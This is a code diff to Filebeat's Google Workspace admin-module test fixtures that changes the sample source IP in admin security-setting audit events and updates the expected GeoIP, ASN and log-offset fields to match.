+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"ENFORCE_STRONG_AUTHENTICATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UPDATE_ERROR_MSG_FOR_RESTRICTED_OAUTH2_APPS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"WEAK_PROGRAMMATIC_LOGIN_SETTINGS_CHANGED","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"SESSION_CONTROL_SETTINGS_CHANGE","parameters":[{"name":"REAUTH_APPLICATION","value":"ADMIN_CONSOLE"},{"name":"REAUTH_SETTING_NEW","value":"INHERIT"},{"name":"REAUTH_SETTING_OLD","value":"NEVER"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"CHANGE_SESSION_LENGTH","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"SECURITY_SETTINGS","name":"UNBLOCK_ON_DEVICE_ACCESS","parameters":[{"name":"OAUTH2_SERVICE_NAME","value":"CALENDAR"},{"name":"ORG_UNIT_NAME","value":"org"}]}} diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json index 1af74f0a4dad..7ec4b2c168dd 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json 
@@ -9,7 +9,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_STRONG_AUTHENTICATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -26,23 +26,19 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -64,7 +60,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -77,26 +73,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 461, + "log.offset": 460, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -118,7 +110,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"DISALLOW_SERVICE_FOR_OAUTH2_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -131,26 +123,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 903, + "log.offset": 901, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -172,7 +160,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_APP_ACCESS_SETTINGS_COLLECTION_ID\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -188,26 +176,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1348, + "log.offset": 1345, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -228,7 +212,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ADD_TO_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -243,26 +227,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1903, + "log.offset": 1899, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -283,7 +263,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -298,26 +278,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2424, + "log.offset": 2419, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -338,7 +314,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -351,26 +327,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2950, + "log.offset": 2944, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -392,7 +364,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -409,26 +381,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 3383, + "log.offset": 3376, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -450,7 +418,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -467,26 +435,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 3917, + "log.offset": 3909, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -508,7 +472,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
